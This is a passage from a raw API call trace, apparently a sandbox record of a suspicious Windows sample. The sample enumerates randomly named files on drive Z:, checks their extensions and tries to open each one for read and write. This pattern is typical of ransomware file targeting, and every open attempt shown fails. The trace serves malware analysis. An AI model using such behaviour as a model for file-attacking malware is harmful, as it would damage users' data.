dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.228] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15886, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mcLK0zRep8.ots", cAlternateFileName="")) returned 1 [0185.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.228] PathFindExtensionW (pszPath="Z:\\mcLK0zRep8.ots") returned=".ots" [0185.233] CreateFileW (lpFileName="Z:\\mcLK0zRep8.ots" (normalized: "z:\\mclk0zrep8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.236] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xab34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p7Ha2r1u6wluhJ.pptx", cAlternateFileName="")) returned 1 [0185.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.236] PathFindExtensionW (pszPath="Z:\\p7Ha2r1u6wluhJ.pptx") returned=".pptx" [0185.241] CreateFileW (lpFileName="Z:\\p7Ha2r1u6wluhJ.pptx" (normalized: "z:\\p7ha2r1u6wluhj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.242] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8b6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJonu6wFMMd.bmp", cAlternateFileName="")) returned 1 [0185.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.242] PathFindExtensionW (pszPath="Z:\\iJonu6wFMMd.bmp") returned=".bmp" [0185.247] CreateFileW (lpFileName="Z:\\iJonu6wFMMd.bmp" (normalized: "z:\\ijonu6wfmmd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.249] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbd6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KeH2iEJnN7k1r.odt", cAlternateFileName="")) returned 1 [0185.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.249] PathFindExtensionW (pszPath="Z:\\KeH2iEJnN7k1r.odt") returned=".odt" [0185.254] CreateFileW (lpFileName="Z:\\KeH2iEJnN7k1r.odt" (normalized: "z:\\keh2iejnn7k1r.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.256] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x140ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9lpH4LUvBOFfSshu6h.csv", cAlternateFileName="")) returned 1 [0185.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.256] PathFindExtensionW (pszPath="Z:\\9lpH4LUvBOFfSshu6h.csv") returned=".csv" [0185.260] CreateFileW (lpFileName="Z:\\9lpH4LUvBOFfSshu6h.csv" (normalized: "z:\\9lph4luvboffsshu6h.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.266] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2XXFjQNQ26X8Wc.swf", cAlternateFileName="")) returned 1 [0185.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.266] PathFindExtensionW (pszPath="Z:\\2XXFjQNQ26X8Wc.swf") returned=".swf" [0185.271] CreateFileW (lpFileName="Z:\\2XXFjQNQ26X8Wc.swf" (normalized: "z:\\2xxfjqnq26x8wc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.273] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KLswtt0JPiPQkCC6R3Lm.m4a", cAlternateFileName="")) returned 1 [0185.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.273] PathFindExtensionW (pszPath="Z:\\KLswtt0JPiPQkCC6R3Lm.m4a") returned=".m4a" [0185.278] CreateFileW (lpFileName="Z:\\KLswtt0JPiPQkCC6R3Lm.m4a" (normalized: "z:\\klswtt0jpipqkcc6r3lm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.280] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9304, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bVYQpQ1.mp4", cAlternateFileName="")) returned 1 [0185.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.280] PathFindExtensionW (pszPath="Z:\\bVYQpQ1.mp4") returned=".mp4" [0185.285] CreateFileW (lpFileName="Z:\\bVYQpQ1.mp4" (normalized: "z:\\bvyqpq1.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.287] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd722, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pQaKrG.pptx", cAlternateFileName="")) returned 1 [0185.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.287] PathFindExtensionW (pszPath="Z:\\pQaKrG.pptx") returned=".pptx" [0185.291] CreateFileW (lpFileName="Z:\\pQaKrG.pptx" (normalized: "z:\\pqakrg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.293] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf4a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzVWpbVP.doc", cAlternateFileName="")) returned 1 [0185.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.293] PathFindExtensionW (pszPath="Z:\\AzVWpbVP.doc") returned=".doc" [0185.297] CreateFileW (lpFileName="Z:\\AzVWpbVP.doc" (normalized: "z:\\azvwpbvp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.299] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11b85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EmJj9nJ.pptx", cAlternateFileName="")) returned 1 [0185.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.299] PathFindExtensionW (pszPath="Z:\\EmJj9nJ.pptx") returned=".pptx" [0185.303] CreateFileW (lpFileName="Z:\\EmJj9nJ.pptx" (normalized: "z:\\emjj9nj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.305] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xadfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUgAWuSkZ3EbpCZ5Rvs.gif", cAlternateFileName="")) returned 1 [0185.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.305] PathFindExtensionW (pszPath="Z:\\fUgAWuSkZ3EbpCZ5Rvs.gif") returned=".gif" [0185.310] CreateFileW (lpFileName="Z:\\fUgAWuSkZ3EbpCZ5Rvs.gif" (normalized: "z:\\fugawuskz3ebpcz5rvs.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.311] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6fbf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MwAvirxPiQV.swf", cAlternateFileName="")) returned 1 [0185.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.311] PathFindExtensionW (pszPath="Z:\\MwAvirxPiQV.swf") returned=".swf" [0185.315] CreateFileW (lpFileName="Z:\\MwAvirxPiQV.swf" (normalized: "z:\\mwavirxpiqv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.317] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1339b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vfiyj.gif", cAlternateFileName="")) returned 1 [0185.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.317] PathFindExtensionW (pszPath="Z:\\vfiyj.gif") returned=".gif" [0185.321] CreateFileW (lpFileName="Z:\\vfiyj.gif" (normalized: "z:\\vfiyj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.322] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1526f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USKBVwnLaYIUmcn.mp4", cAlternateFileName="")) returned 1 [0185.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.322] PathFindExtensionW (pszPath="Z:\\USKBVwnLaYIUmcn.mp4") returned=".mp4" [0185.326] CreateFileW (lpFileName="Z:\\USKBVwnLaYIUmcn.mp4" (normalized: "z:\\uskbvwnlayiumcn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.328] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6JQB.pptx", cAlternateFileName="")) returned 1 [0185.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.328] PathFindExtensionW (pszPath="Z:\\s6JQB.pptx") returned=".pptx" [0185.333] CreateFileW (lpFileName="Z:\\s6JQB.pptx" (normalized: "z:\\s6jqb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.334] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9f6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sl70jWmP2ggACy.png", cAlternateFileName="")) returned 1 [0185.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.335] PathFindExtensionW (pszPath="Z:\\sl70jWmP2ggACy.png") returned=".png" [0185.339] CreateFileW (lpFileName="Z:\\sl70jWmP2ggACy.png" (normalized: "z:\\sl70jwmp2ggacy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.341] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xab59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NBAT3tYNBcHdC.ppt", cAlternateFileName="")) returned 1 [0185.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.341] PathFindExtensionW (pszPath="Z:\\NBAT3tYNBcHdC.ppt") returned=".ppt" [0185.346] CreateFileW (lpFileName="Z:\\NBAT3tYNBcHdC.ppt" (normalized: "z:\\nbat3tynbchdc.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.351] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cdHLWs2KE.docx", cAlternateFileName="")) returned 1 [0185.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.351] PathFindExtensionW (pszPath="Z:\\cdHLWs2KE.docx") returned=".docx" [0185.356] CreateFileW (lpFileName="Z:\\cdHLWs2KE.docx" (normalized: "z:\\cdhlws2ke.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.358] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf37f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SHCEF.gif", cAlternateFileName="")) returned 1 [0185.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.358] PathFindExtensionW (pszPath="Z:\\SHCEF.gif") returned=".gif" [0185.364] CreateFileW (lpFileName="Z:\\SHCEF.gif" (normalized: "z:\\shcef.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.366] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfcb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P6tWitG0.ppt", cAlternateFileName="")) returned 1 [0185.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.366] PathFindExtensionW (pszPath="Z:\\P6tWitG0.ppt") returned=".ppt" [0185.371] CreateFileW (lpFileName="Z:\\P6tWitG0.ppt" (normalized: "z:\\p6twitg0.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.373] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZcPV3qk7PkeQOKKV.xls", cAlternateFileName="")) returned 1 [0185.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.373] PathFindExtensionW (pszPath="Z:\\ZcPV3qk7PkeQOKKV.xls") returned=".xls" [0185.379] CreateFileW (lpFileName="Z:\\ZcPV3qk7PkeQOKKV.xls" (normalized: "z:\\zcpv3qk7pkeqokkv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.380] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x134dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X18sQ2pVfY.mp3", cAlternateFileName="")) returned 1 [0185.380] 